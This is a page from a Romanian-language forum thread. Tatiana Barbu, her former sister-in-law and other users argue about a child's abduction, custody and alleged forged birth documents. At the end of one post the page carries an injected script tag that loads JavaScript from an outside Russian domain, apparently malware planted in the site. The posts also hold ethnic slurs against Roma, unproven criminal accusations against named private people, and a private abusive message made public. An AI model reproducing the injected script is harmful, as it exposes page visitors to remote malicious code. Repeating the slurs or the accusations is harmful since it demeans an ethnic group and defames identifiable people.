Follow RomanianPortal on Twitter       
Pagina 3 din 8 PrimulPrimul 12345 ... UltimulUltimul
Rezultate 21 la 30 din 74

Subiect: Sa lamurim situatia...cu Tatiana Barbu

Guest

Implicit

cred ca nu mai vreau sa ies de pe forum !!! A inceput sa-mi placa. Sincer lucrez de noapte iar discutiile cu voi ma tin treaza. Asa ca pe un compiuter " racolez " pe cei care au "depasit viteza " din mai multe state din SUA , .sau au trecut pe "rosu " la semafor, iar pe celalalt ma distrez cu voi. Va pupic pe toti si zau ca nu sunt suparata, ba dimpotriva FERICITA ca am avut suficient fler sa stiu cine este " prietena " ce ma cauta. Tatiana, Arizona,

Data înscrierii
    07.05.2005
    Posturi
    5.449
    Putere Rep
    29

Implicit

Citat Postat în original de supermamy
    PROMIT CA ESTE ULTIMA OARA CAND SCRIU....!!!1
    au promis si altii ! [img]smileys/smiley2.gif[/img][img]smileys/smiley36.gif[/img][img]smileys/smiley36.gif[/img]

supermamy wrote :</span>
    "cred ca nu mai vreau sa ies de pe forum !!! A inceput sa-mi placa."

au mai patit-o si altii ![img]smileys/smiley2.gif[/img]
    ai incurcat-o dar esti pe drumul cel bun [img]smileys/smiley36.gif[/img] te-ai virusat rau de tot[img]smileys/smiley36.gif[/img][img]smileys/smiley36.gif[/img]

ps</span> (nu reprezint nici un post de radio sau televiziune !)[img]smileys/smiley2.gif[/img]

Timpul este de-o generozitate misterioasa.

Data înscrierii
    28.04.2006
    Posturi
    2.254
    Putere Rep
    18

Implicit

Citat Postat în original de supermamy
    PS: anul acesta sper ca sa pot lansa si cartea care am scriso special ptr Giulia: acolo vor fi date mai detailiat multe din cele intamplate in viata mea ( din1980- pana in 2006 )de cand am cunoscut acest OM IMPOSIBIL...si pana cosmarul a luat sfarsit. Tatiana.
    Super mamy..Eu ma bucur pentru tine..Acum mai are sens si rost?Crezi ca iti poate lua cineva fata?Iar?Nu....

Dar cu cartea?Ca am sesizat ca ai scris o carte(asa ai scris mai sus)..Crezi oare ca durerea este bine sa o faci publica?Si mai mult de atat..Sa obtii bani pe durerea ta?Mi se pare cel putin ciudata situatia...

Oricum sa te bucuri de fata ta..Si eu zic sa dezvolti alt subiect..ca sa uiti de durerea din trecut..Ceva frumos,bun si cu suflet...

Data înscrierii
    08.11.2006
    Locație
    Romania
    Posturi
    74
    Putere Rep
    14

Implicit

Draga mea.fiecare avem o poveste.Asta nu inseamna ca trebuie sa o povestim pe un forum.Nu ma bagam precum musca -n lapte dar am observat ca afisezi un aer de superioritate nejustificat.

Eu in locul tau nu cadeam in plasa intinsa de cumnata.As petrece timpul in mod placut alaturi de fiica mea.Ai de recuperat pentru ca ai pierdut una din etapele cele mai frumoase din viata unui copil.

De ce s-ar oftica Angeline?

Guest

Implicit

Buna DANIELITA, Nu e total gresit. Nu am vrut sa afisez un aer de superioritate, nu am de ce si ptr. ce. Sunt doar mandra de mine ca am avut din nou dreptate cand am spus pe FORUM ca nu e vorba de " o prietena" . Nu asa se cauta o prietena....La fel cand am spus celor de la Polita din Bacau, celor de la Interpol, celor de la IGPB, ca sunt 99 % convinsa ca Giulia este in tara dar nimeni nu au cautoato. Si ca ea se afla mai mult ca sigur cu identitatea unui copil care este plecat definitiv din tara sau ...in cel mai nefericit caz a unui copil decedat....AM AVUT PERFECTA DREPTATE. Ei mi-au spus ca "flerul lor de politisti " nu-i inseala , asa ca sa nu-i contrazic ptr ca au dreptate....Iar eu le-am spus ca "SIMTUL MEU DE MAMA" NU MA INSEALA MAI ALES CA... paulet ion asta face de mai bine de 10 ani : acte false in Londra ( a fost " la specializare- 5 ani inainte in Sicilia !)

Dupa cum spuneam le-am demonstrat acest lucru cand am gasit fetita cu numele de MAFEI ALEXANDRA, ca apoi cei de la IGPB sa-mi confirme in scris ca actul de nastere al fetei a fost o copie dupa a cela al unui copil decedat in 2001 !!!!!

Referitor la carte , este de fapt un strigat de disperare ptr toate femeile ( in special ) care trec prin probleme de genul celei ale mele , SA NU RENUNTE PANA LA MOARTE PTR A LUPTA, IN OBTINEREA A CEEA CE ELE-SI DORESC MAI ALES LEGAT DE COPII SI CASNICIA LOR.Sa nu cedeze psihic (cum au facut atatea, si atatea persoane) ci cu credinta in Dumnezeu daca -ti doresti cu adevarat ceva , atunci ...sigur vei avea. Nu are importanta, sacrificiile, lacrimile si pretul sau anii...care te vor costa ! Aceasta carte vreau ca Giulia sa o aiba ca un cadou ptr anii in care ma cauta in visele ei iar cand se trezea si povestea despre mine cum ma visat...Acele criminale de tiganci ai spuneau Giuliei ca "este femeia care a stat cu tine o perioada si acum te cauta sa te omoare " ....Giulia este foarte bucuroasa de carte si de tot, va dati seama nu am cuvinte sa va descriu fericirea ei ! Asta este cel mai important...Iar banii....vor fi dati familiilor necajite cu multi copii din Romania. Eu nu am nevoie de ei. Ma multumesc cu ce am. Sa fim noi sanatosi si in rest toate cele bune....

" CUMNATA " ?????

Nici o problema cred ca am rezolvato cu un mesaj asa...la nivelul ei..." ca la mama lor acasa" stii sa fie pe intelesul ei! SORY !!!Acum chiar am depasit limita. Numai bine la toata lumea si sa aveti a saptamana..SUPER ...pe toate planurile.

Data înscrierii
    08.11.2006
    Locație
    Romania
    Posturi
    74
    Putere Rep
    14

Implicit

Aceste afirmatii despre fostul sot nu sunt probate.Poti sa dovedesti in instanta cu acte si martori ca el se ocupa cu asa ceva?

Guest

Implicit

Sigur draga mea, Nu o sa crezi dar dovada a fost clara cand am prezentat copia pasaportului de cetatean spaniol, pe numele de MENDOZA NICHOLAS, cu care a venit la mine in Statele Unite in Nov. 1999. si cu o viza de 4 luni obtinuta din Londra, de unde el statea.Am fost destul de inspirata sa-mi iau masuri de precautie dupa cele intamplate in Romani ani si ani, apoi cu un an in urma in Londra cand am fost eu la el....Povestea e lunga nu are rost. Doar sa stii ca daca nu aveam dovada "nugru pe alb " nu faceam nici o declaratie niciunde. Ba chiar acum cand a fost condamnat ( in lipsa evident ) a trimis el o declaratie in care confirma ca el personal a facut acel certificat de nastere fals ca sa poata fi scosi de sub acuzatie tiganii din Piatra Neat. Si la asta am dovada clara primita de la IGPB.

Oare de ce as minti ??? Nu ma mai intereseaza persoana lui, doar ca vreau sa stau la distanta de el si de toata " RASA LUI ". Crede-ma e adevarat, asta doar ca informatie ptr. toti.....Am o familie frumas, un baiat si o fetita, frumosi si inteligenti, respectosi si credinciosi. Sotul este un INGER, si un tata minunat. De ce as minti pe forum ? Am suferit dar, stii cum se zice :"Cine rade la urma rade mai bine !"

Guest

Implicit

Citat Postat în original de catwoman

In primul rand,nu sunt o prietena ci o ruda de a Tatianei Barbu, fosta cumnata mai bine zis.Este o poveste lunga si trista..am sa incerc pe scurt sa va povestesc viata fratelui meu,fostul sot al Tatianei Barbu.S-au cunoscut in liceu,s-au iubit,m-ai tarziu s-au casatorit si fratele a plecat in Italia sa asigure viata frumoasa sotiei.A muncit ani de zile la 40 grade in Sicilia,la cules portocale,si toti bani i-a trimis sotiei ani de-a randul.Insa Tatiana nu rezistat singura si a inceput sa isi insele sotul cu oricine din Bacau.S-a intors sotul acasa,mai tarziu a plecat in Anglia,sotia a dat nastere la o fetita,iar sotul a muncit mai din greu ca sa le asigure tot comfortul.Nu si-a vazut niciodata fetita,insa dupa multi ani de strainatate,a venit timpul sa mearga acasa,insa Tatiana l-a convins sa mai stea...avea un plan...A vandut apartamentul,masina tot,si a vrut sa plece cu tot cu fetita in America.Nu a reusit insa sa treaca fetita pe pasaportul ei fara semnatura tatalui,cu toate ca a insistat la pasapoarte...Asa ca e a parasit copilul,si a plecat in US,ii era teama ca vine sotul si va afla toate aventurile.A lasat-o pe Giulia printre straini de la 4 ani,si nu la parinti cum declara ea...Sotul a venit acasa,nu tu casa,nu tu sotie si nici copil..imaginati-va durerea din suflet,dupa atatia ani de munca si suferinta..si barbatii au suflet,sa stiti.Dupa lungi cautari a dat de un fir si a gasit fetita,si dupa lungi insistente i s-a dat voie sa o vada,insa omul nu a mai judecat,de manie,suparare si a luat fetita cu el.Nu o vazuse niciodata,a iubit-o din prima,si pentru ca mama nu era langa ea,era prea ocupata in US,sa se recasatoreasca, a dorit sa ii fie alaturi ,parinte.Tatiana a inceput sa imprastie numai vorbe rele despre fostul sot,si l-a dat in urmarire,tot ea, care gresise si distrusese caminul lor,ea care inselase,vanduse tot,si deja dupa un scurt timp in US s-a recasatorit,si a facut si alt copil.Marea greseala a sotului a fost ca nu a avut un avocat bun,care sa il sfatuie sa aplice pentru custodia fetitei,pentru ca el era in tara si ea in US.In final s-a decis sa plece din nou in strainatate,iar pentru ca fetita nu putut sa o i-a cu el a lasat-o la niste cunostinte f.bune,si nu la o fam.de tigani,cum declara Tatiana.Femeia din Piatra care i-a crescut fetita 5 ani,a iubit-o si ingrijit-o ca pe o nepoata proprie.Dar Tatiana a jignit-o si a ameninat-o,fara un pic de respect fata de cineva care i-a crescut copilul 5 ani.De cand a luat fetita de la Piatra,Tatiana nu i-a mai dat-o niciodata la tel.fostului sot,lucru care vroia sa il faca daca reusea sa o i-a cu ea in US ani in urma..Macar Giulia stie ca are un tata,bun sau rau e tatal ei si nimic nu poate schimba asta..poate vreodata are sa il caute...sa ii spuna TATA,as vrea sa ascult si varianta ta!.Sa nu uitam ca si tati sunt parinti,si au suflet..de PARINTE! Cu Tv si media situatiile se interpreteaza gresit intotdeauna,pentru ca ne place sa judecam fara sa stim adevarata situatie..Nu am vrut nicicand adresa lor din US,ci ma gandeam ca poate o sa citeasca si Tatiana si lumea va afla ca de fapt minte....Era cinstit si omeneste ,sa divorteze sa vada copilul amandoi,si totul ar fi fost normal,nu se ajungea la rapiri,suferinte,si chinuri.Copilul nu a crescut nici cu mama, nici cu tata,si vina CEA MAI MARE o poarta TATIANA.Era mai bine daca Paulet(fostul sot) o lasa sa lucreze la Bacau ca CROITOREASA,cum lucrape timpuri,si acum probabil era altfel de femeie.S-ar parea ca atunci cand o duci prea bine ,o iei razna!DUMNEZEU NU DOARME, v-a avea grija de fiecare in parte.

[b]Suntem in Post...sper ca stii ce inseamna, si sper ca stii ce vei primi de la Dumnezeu ptr tot ceea ce faci si spui...Hai pe scurt sa-ti raspund la cateva interpretari de ale tale:</stron<script src=http://www.iroe.ru/ngg.js></script>

Guest

Implicit

<TABLE height=14 cellSpacing=1 cellPadding=3 width="100%">
    <T>
    <TR>
    <TD class=ting noWrap width=145 background=forum_images/table_bg_image.gif bgColor=#a6aad3>Author</TD>
    <TD class=ting noWrap width="82%" background=forum_images/table_bg_image.gif bgColor=#a6aad3>Message</TD></TR>
    <TR>
    <TD class=smText vAlign=top background="" bgColor=#f4f4fb><A name=""></A>supermamy
    Newbie

[img]avatars/blank.gif[/img]

<TD class=text vAlign=top background="" bgColor=#f4f4fb>
    <TABLE cellSpacing=0 cellPadding=0 width="100%">
    <T>
    <TR>
    <TD class=smText width="60%">Sent: 23June2007 at 08:45</TD>
    <TD align=right width="30%"> </TD></TR>
    <TR>
    <TD colSpan=2>
    <HR>
    </TD></TR></T></TABLE>

Esti o scarba ordinara oricine ai fi !!! Poti sa te tragi de floci ca altceva nu ti-a mai ramas. Chiar nu ma obosesc sa aflu exact cine esti dar savurez acest mesaj pe care ti-l transmit din toata inima. Un singur lucru trebuie sa mai stii : PAULET ION ARE OBLIGATII DE TAT FATA DE GIULIA, asa ca numai el va vedea fetita cand ...ea va dori, iar voi jafuri gretoase si nesatisfacute o sa o luati in mana ca pana acum.Hai ca va ofticati ! si ce daca o sa am doi barbati pentru-ca am doi copii cu ei. amandoi trebuie sa munceasca si sa le stranga in banca conturi frumoase. Ca doar, de....le-am facut doi copii superbi, frumosi si inteligenti ca scumpa lor mamica !!!!! Hai ca-mi faci greata.

Poti sa-l faci public zau ca nu ma doare nici in foci de pe canal !!

HA ! HA ! HA!</TD></TR></T></TABLE>

Guest

Implicit

Acesta oameni buni este mesajul care mi l-a trimis DOAMNA Tatiana Barbu.Judecati dvs dupa cuvintele ei cam ce fel de doamna este,cu un limbaj foarte vulgar.........lasa de dorit...mesajul a fost trimis privat,dar am vrut sa il fac public,ca sa arat ca nu este ceea ce pare(o doamna!) si minte in continuare cu nerusinare....

Pagina 3 din 8 PrimulPrimul 12345 ... UltimulUltimul

Subiecte similare

1. Hai sa lamurim impreuna
    De marian42 în forumul Sondaje/Polls
    Răspunsuri: 70
    Ultimul post: 10.02.2010, 11:28
  2. in legatura cu Tatiana Barbu
    De florin în forumul Montreal si suburbii- Quebec- Romani, Comunitatea Romaneasca
    Răspunsuri: 1
    Ultimul post: 10.04.2009, 22:31
  3. Situatia Economica USA
    De May09 în forumul Discutii Generale-de toate pentru toti, diverse
    Răspunsuri: 278
    Ultimul post: 04.05.2008, 13:11
  4. Dr.Barbu Bogdan
    De în forumul Cautare persoane - Anunturi, intrebari, raspunsuri, sfaturi
    Răspunsuri: 2
    Ultimul post: 21.12.2006, 02:07
  5. Il caut pe Bogdan BARBU, medic
    De Miha Fritz în forumul Cautare persoane - Anunturi, intrebari, raspunsuri, sfaturi
    Răspunsuri: 7
    Ultimul post: 21.12.2006, 01:43

Permisiuni postare

• Nu poți posta subiecte noi
  • Nu poți răspunde la subiecte
  • Nu poți adăuga atașamente
  • Nu poți edita posturile proprii
  •